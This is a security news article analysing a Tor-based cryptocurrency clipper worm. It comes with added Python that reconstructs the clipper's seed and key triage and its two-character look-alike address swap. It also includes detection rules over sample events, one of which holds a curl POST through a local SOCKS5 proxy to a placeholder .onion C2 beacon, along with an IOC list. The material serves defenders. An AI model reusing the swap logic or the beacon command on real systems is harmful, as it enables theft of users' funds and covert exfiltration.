GBHackers

New Crypto Clipper Uses Windows Script Host and ActiveXObject for Remote Code Execution


A novel Windows-based cryptocurrency clipper, active since February 2026, leverages Windows Script Host (WScript) and ActiveXObject calls to achieve remote code execution and persistent, high-frequency data theft.

The campaign stands out because it avoids traditional installers and exposed IP-based command-and-control (C2) infrastructure. Instead, it bundles a portable Tor client, routes all C2 traffic through a local SOCKS5 proxy at localhost:9050, and uses JScript-based logic both to steal clipboard contents and to accept runtime commands from a Tor hidden-service C2.

In observed infections, initial access is gained via malicious .lnk shortcut files commonly propagated on USB removable media.

When a user opens a shortcut, a staged worm component executes and spreads by creating additional .lnk files that mimic legitimate documents, hiding the originals, and dropping two obfuscated JavaScript payloads into a folder with a five-character name under C:\Users\Public\Documents.

The worm establishes persistence by creating two scheduled tasks, one to spread to newly inserted USB devices and another to launch the stealer component on a recurring basis, and it adds Microsoft Defender exclusions so that its dropped payloads are not scanned.

The clipper's runtime is dominated by script-driven operations. The JavaScript payload uses WScript and ActiveXObject to query the environment (including a simple anti-analysis check that exits if Task Manager is running), spawn hidden processes, and launch a renamed Tor binary (ugate.exe).

Microsoft Threat Intelligence and Microsoft Defender Experts identified a Windows-based cryptocurrency clipper that has affected users. 

High level execution flow (Source : Microsoft).

After waiting roughly 60 seconds for Tor to bootstrap, the malware generates a victim GUID, registers with a .onion C2, and enters a tight loop: polling /route.php for commands, monitoring the clipboard at approximately 500 ms intervals for BIP39 seed phrases and private-key patterns, replacing copied wallet addresses with attacker-controlled alternatives, and uploading screenshots asynchronously to /recvf.php.

Crypto Clipper Uses Windows Script

If the C2 returns an EVAL instruction, the clipper evaluates attacker-supplied JScript code at runtime, functionally converting a financially motivated stealer into a lightweight backdoor.

The .lnk payload scans the USB device for common document files such as .doc, .xlsx and .pdf, hides the original files, and creates additional .lnk shortcut files with the same file names.


Worm staged via additional shortcuts (Source : Microsoft).

This architecture complicates traditional network-based detection and takedown efforts. By resolving .onion addresses within the bundled Tor client and directing traffic only to localhost:9050, the actor reduces DNS and IP telemetry visibility.

The malware relies on HTTP-over-Tor POSTs (via curl through the SOCKS5 proxy) for beacons, exfiltration of seeds and private keys, and file uploads.

When the clipboard holds a Bitcoin P2SH address (one that starts with "3" and is 32 to 36 characters long), the stealer replaces it with an attacker-controlled address whose first two characters match the original, so a quick glance at the pasted address does not reveal the swap.

Function used to replace a BTC P2SH wallet address (Source : Microsoft).

The C2 protocol includes heartbeat GUIDs, SEED/PKEY exfiltration actions, REPL notifications for address replacement, and the EVAL command for remote code execution.
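The clipboard triage and the two-character look-alike swap described above, as an added Python example reconstructed from the article's description. This is not the malware's code and not Microsoft's analysis tooling: the regular expressions, the attacker address pool, the victim address and the sample seed and key are all constructed for illustration (syntactically plausible, not real keys or addresses), the BIP39 check is a word-count approximation that does not consult the 2048-word list, and what happens when no pool address shares the first two characters is an assumption (the address is left untouched). It also shows why the prefix match defeats the glance most users give a pasted address and what a full comparison catches.

```python
import re
from typing import List, Optional, Tuple

# Constructed patterns approximating the checks the write-up describes; the
# malware's own regular expressions are not reproduced on the page.
BASE58 = r"[1-9A-HJ-NP-Za-km-z]"
# Article: a P2SH address starts with "3" and is 32 to 36 characters long.
P2SH_RE = re.compile(rf"\b3{BASE58}{{31,35}}\b")
# Mainnet WIF private keys: '5' + 50 chars (uncompressed) or 'K'/'L' + 51 chars (compressed).
WIF_RE = re.compile(rf"\b[5KL]{BASE58}{{50,51}}\b")
# BIP39 approximation: exactly 12 or 24 lowercase words of 3 to 8 letters. A real
# implementation would also check every word against the 2048-word BIP39 list.
_WORD = r"[a-z]{3,8}"
BIP39_RE = re.compile(rf"^(?:{_WORD}\s+){{11}}{_WORD}$|^(?:{_WORD}\s+){{23}}{_WORD}$")

# Constructed sample values: syntactically plausible, not real keys or addresses.
SAMPLE_SEED = "abandon ability able about above absent absorb abstract absurd abuse access accident"
SAMPLE_WIF = "5JabcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ12"
VICTIM_ADDRESS = "3JbRq4vWnTpE8sDkX2cUzYfA7mHgV5tQeN"
ATTACKER_POOL = [
    "3JwhXqBu2nR5sYtVkD8pMcZeA4HfG7TiQm",
    "3Kq9fRtYuVwXzA2bC4dE6gH8jK3mN5pQ7s",
    "3Mz7yTbNcV4xWqR2sE9fG6hJ8kL3pA5dUe",
]


def classify(clip: str) -> Optional[str]:
    """Triage a clipboard value the way the article describes: SEED, PKEY or a swappable address."""
    text = clip.strip()
    if BIP39_RE.match(text):
        return "SEED"
    if WIF_RE.fullmatch(text):
        return "PKEY"
    if P2SH_RE.search(text):
        return "BTC_P2SH"
    return None


def pick_lookalike(original: str, pool: List[str]) -> Optional[str]:
    """Return an attacker address that agrees with the original on its first two characters."""
    for candidate in pool:
        if candidate[:2] == original[:2] and candidate != original:
            return candidate
    return None  # assumption: with no look-alike available, the address is left alone


def swap_addresses(clip: str, pool: List[str]) -> Tuple[str, List[Tuple[str, str]]]:
    """Replace every P2SH address in the clipboard text; return the new text and the swaps made."""
    swaps: List[Tuple[str, str]] = []

    def _replace(match: "re.Match[str]") -> str:
        original = match.group(0)
        replacement = pick_lookalike(original, pool)
        if replacement is None:
            return original
        swaps.append((original, replacement))
        return replacement

    return P2SH_RE.sub(_replace, clip), swaps


def prefix_check_passes(expected: str, pasted: str, n: int = 2) -> bool:
    """The glance most users give a pasted address: do the first n characters agree?"""
    return expected[:n] == pasted[:n]


def full_check_passes(expected: str, pasted: str) -> bool:
    """What actually catches the swap: compare the whole string."""
    return expected == pasted


if __name__ == "__main__":
    for sample in (SAMPLE_SEED, SAMPLE_WIF, VICTIM_ADDRESS, "nothing interesting"):
        print(f"{classify(sample)!s:9} <- {sample[:40]}")
    pasted, swaps = swap_addresses(f"send to {VICTIM_ADDRESS} thanks", ATTACKER_POOL)
    print(pasted, swaps)
    swapped = swaps[0][1]
    print("prefix check:", prefix_check_passes(VICTIM_ADDRESS, swapped))  # True: the swap survives a glance
    print("full check:  ", full_check_passes(VICTIM_ADDRESS, swapped))    # False: only a full compare catches it
```

The defensive takeaway is in the last two functions: a wallet or payment workflow that verifies a pasted address by its first few characters is exactly what this swap is designed to survive, so verification must compare the whole address (or better, use an address book that never goes through the clipboard).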

Defenders should prioritize behavioral detection: look for script interpreters (wscript.exe, cscript.exe, wsmprovhost) spawning unexpected child processes or launching renamed binaries, processes invoking localhost:9050 or creating a local SOCKS proxy, PowerShell or script-based screen-capture commands, and any signs of clipboard reading or address substitution.

Microsoft Defender for Endpoint flags multiple components of this campaign (for example, Suspicious JavaScript process and Possible data exfiltration using Curl), while Microsoft Defender Antivirus detects the family as Trojan:Win32/CryptoBandits.A.

Mitigation recommendations include disabling AutoRun/AutoPlay for removable media, blocking .lnk execution from removable drives via GPO, restricting or monitoring use of wscript.exe and cscript.exe, and enabling Attack Surface Reduction rules that block obfuscated scripts and suspicious child-process chains.

Hunt for local SOCKS5 activity on localhost:9050 and correlate scripting behavior with network, clipboard, and process telemetry to surface infections before funds are stolen.
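To make the hunting guidance above concrete, here is an added Python example (not Microsoft's detection logic and not a Defender query) that runs a handful of behavioural rules over constructed Sysmon-style events: a script host spawning a non-script child, an on-disk name that disagrees with the PE's OriginalFileName, connections to 127.0.0.1:9050, curl invoked with SOCKS5 or .onion arguments, schtasks /Create driven by a script host, and a registry write under the Defender exclusions key. Field names follow Sysmon's schema, but every value is an assumption made for the sample: the five-character folder name qx7kp, the task name, the placeholder onion host, the curl arguments, and that the renamed Tor binary reports tor.exe as its OriginalFileName.

```python
from typing import Callable, Dict, Iterable, List, Optional

Event = Dict[str, object]
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "wsmprovhost.exe"}
LOCAL_SOCKS = ("127.0.0.1", 9050)  # the bundled Tor client's SOCKS5 listener, per the article

# Constructed Sysmon-style events (EventID 1 process create, 3 network connect,
# 13 registry value set). Field names follow Sysmon; every value is made up.
DROP_DIR = r"C:\Users\Public\Documents\qx7kp"
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "OriginalFileName": "wscript.exe", "CommandLine": 'wscript.exe //B "' + DROP_DIR + '\\a.js"'},
    {"EventID": 1, "Image": DROP_DIR + r"\ugate.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "OriginalFileName": "tor.exe", "CommandLine": "ugate.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe --socks5-hostname 127.0.0.1:9050 -X POST -d GUID=... http://example-c2.onion/route.php"},
    {"EventID": 3, "Image": r"C:\Windows\System32\curl.exe", "DestinationIp": "127.0.0.1", "DestinationPort": 9050},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "OriginalFileName": "schtasks.exe",
     "CommandLine": 'schtasks.exe /Create /SC MINUTE /MO 5 /TN Updater /TR "wscript.exe //B ' + DROP_DIR + '\\b.js"'},
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\" + DROP_DIR},
]
BENIGN_EVENT: Event = {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
                       "ParentImage": r"C:\Windows\explorer.exe", "OriginalFileName": "NOTEPAD.EXE",
                       "CommandLine": "notepad.exe"}


def _basename(path: object) -> str:
    return str(path).rsplit("\\", 1)[-1].lower()


def rule_script_host_child(ev: Event) -> Optional[str]:
    """A script interpreter spawning something other than another script host."""
    if ev.get("EventID") != 1 or _basename(ev.get("ParentImage")) not in SCRIPT_HOSTS:
        return None
    child = _basename(ev.get("Image"))
    return None if child in SCRIPT_HOSTS else f"{_basename(ev['ParentImage'])} spawned {child}"


def rule_renamed_binary(ev: Event) -> Optional[str]:
    """On-disk name disagrees with the PE's OriginalFileName (e.g. tor.exe shipped as ugate.exe)."""
    if ev.get("EventID") != 1:
        return None
    original = str(ev.get("OriginalFileName", "")).lower()
    image = _basename(ev.get("Image"))
    return f"{image} has OriginalFileName {original}" if original and original != image else None


def rule_local_socks(ev: Event) -> Optional[str]:
    """Any process talking to the local Tor SOCKS5 port."""
    if ev.get("EventID") != 3:
        return None
    dest = (str(ev.get("DestinationIp")), int(str(ev.get("DestinationPort", 0))))
    return f"{_basename(ev.get('Image'))} connected to {dest[0]}:{dest[1]}" if dest == LOCAL_SOCKS else None


def rule_curl_via_tor(ev: Event) -> Optional[str]:
    """curl pointed at a SOCKS proxy or an .onion host (the article's HTTP-over-Tor POSTs)."""
    if ev.get("EventID") != 1 or _basename(ev.get("Image")) != "curl.exe":
        return None
    cmd = str(ev.get("CommandLine", "")).lower()
    return "curl with SOCKS5/.onion arguments" if ("socks5" in cmd or ":9050" in cmd or ".onion" in cmd) else None


def rule_schtasks_from_script(ev: Event) -> Optional[str]:
    """Scheduled-task creation driven by a script host (the worm's persistence)."""
    if ev.get("EventID") != 1 or _basename(ev.get("Image")) != "schtasks.exe":
        return None
    cmd = str(ev.get("CommandLine", "")).lower()
    return "schtasks /create from a script host" if "/create" in cmd and _basename(ev.get("ParentImage")) in SCRIPT_HOSTS else None


def rule_defender_exclusion(ev: Event) -> Optional[str]:
    """Registry write under the Defender exclusions key (one way an exclusion lands; an assumption)."""
    if ev.get("EventID") != 13:
        return None
    target = str(ev.get("TargetObject", "")).lower()
    return "Defender exclusion added: " + target if "\\windows defender\\exclusions\\" in target else None


RULES: List[Callable[[Event], Optional[str]]] = [
    rule_script_host_child, rule_renamed_binary, rule_local_socks,
    rule_curl_via_tor, rule_schtasks_from_script, rule_defender_exclusion,
]


def evaluate(events: Iterable[Event]) -> List[Dict[str, str]]:
    """Run every rule over every event; return one finding per (event, rule) hit."""
    findings: List[Dict[str, str]] = []
    for ev in events:
        for rule in RULES:
            detail = rule(ev)
            if detail:
                findings.append({"rule": rule.__name__, "image": _basename(ev.get("Image")), "detail": detail})
    return findings


if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(f"{hit['rule']:26} {hit['image']:14} {hit['detail']}")
```

Each rule on its own is noisy in a real estate (curl and schtasks are legitimate tools, and plenty of software ships renamed binaries); the value is in correlating several of them on one host within a short window, which is what the article's guidance to correlate scripting, network and process telemetry amounts to.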

Indicators of compromise (IOC)

Indicator | Type | Description
7630debd35cac6b7d58c4427695579b3e3a8b1cc462f523234cd6c698882a68c | SHA-256 | Crypto Clipper Worm
a7abf1d9d6686af1cefcd60b17a312e7eb8cfe267def1ec34aeab6128c811630 | SHA-256 | Crypto Clipper Worm
23c1e673f315dafa14b73034a90dd3d393a984451ff6601b8be8142be6487b43 | SHA-256 | Crypto Clipper Worm
cf9fc891ea5ca5ecd8113ef3e69f6f52ff538b6cccbdaa9559106fc72bc6da30 | SHA-256 | Crypto Clipper Worm
100407796028bf3649752d9d2a67a0e4394d752eb8de86daa42920e814f3fae8 | SHA-256 | Crypto Clipper Worm
d14b80cbd1a19d4ad0473a0661297f8fdf598e81ff6c4ab24e212dcad2e54b3f | SHA-256 | Crypto Clipper Worm
9d90f54ae36c6c5435d5b8bed40faf54cc91f6db28574a6310b5ffaeb0362e96 | SHA-256 | Crypto Clipper Worm
67fc5cf395e28294bbb91ed0e954fdf2e80ebd9119022a115a42c286dc8bacf5 | SHA-256 | Crypto Clipper Worm
0020d23b0f9c5e6851a7f737af73fd143175ee47054931166369edd93338538a | SHA-256 | Crypto Clipper Worm
35a6bc44b176a050fd6824904b7604f0f45b0fdfa26bf9500b9e05973b387cfd | SHA-256 | Crypto Clipper Worm
c824630154ac4fdfce94ded01f037c305eab51e9bef3f493c60ff3184a640502 | SHA-256 | Crypto Clipper Worm
d43bf94f0cb0ab97c88113b7e07d1a4024d1610617b5ad05882b1dbab89e15ba | SHA-256 | Crypto Clipper Worm
b2777b73a4c33ac6a409d475057843be6b5d32262ef28a1f1ff5bb52e3834c5f | SHA-256 | Crypto Clipper Worm
7787a9a7d8ae393aa32f257d083903c4dc9b97a1e5b0458c4cd480d4f3cb5b05 | SHA-256 | Crypto Clipper Worm
f3b54984caca95fd496bcfe5d7db1611b08d2f5b7d250b43b430e5d76393f9e0 | SHA-256 | Crypto Clipper Worm
20db98af3037b197c8a846dbf17b87fc6f049c3e0d9a188f9b9a74d3916dd5e1 | SHA-256 | Crypto Clipper Worm
ugate.exe | Filename | Portable Tor binary (renamed)
cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion | Domain | C2 domain
gfoqsewps57xcyxoedle2gd53o6jne6y5nq5eh25muksqwzutzq7b3ad[.]onion | Domain | C2 domain
he5vnov645txpcv57el2theky2elesn24ebvgwfoewlpftksxp4fnxad[.]onion | Domain | C2 domain
lyhizqy2js2eh6ufngkbzntouiikdek5zsdj3qwa22b4z6knpqorgiad[.]onion | Domain | C2 domain
j3bv7g27oramhbxxuv6gl3dcyfmf44qnvju3offdyrap7hurfprq74qd[.]onion | Domain | C2 domain
shinypogk4jjniry5qi7247tznop6mxdrdte2k6pdu5cyo43vdzmrwid[.]onion | Domain | C2 domain
7goms4byw26kkbaanz5a5u5234gusot7rp5imzc3ozh66wwcvmcudjid[.]onion | Domain | C2 domain
facebookwkhpilnemxj7asaniu7vnjjbiltxjqhye3mhbshg7kx5tfyd[.]onion | Domain | C2 domain as listed by the source; this is Facebook's public Tor onion service, so it is more plausibly a Tor connectivity check than attacker infrastructure and should not be blocked on that basis
wt26llpl5k6gok3vnaxmucwgzv2wk3l7nuibbh25clghrtus3p5ctsid[.]onion | Domain | C2 domain
ijzn3sicrcy7guixkzjkib4ukbiilwc3xhnmby4mcbccnsd7j2rekvqd[.]onion | Domain | C2 domain

Note: the .onion domains above are intentionally defanged ([.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.



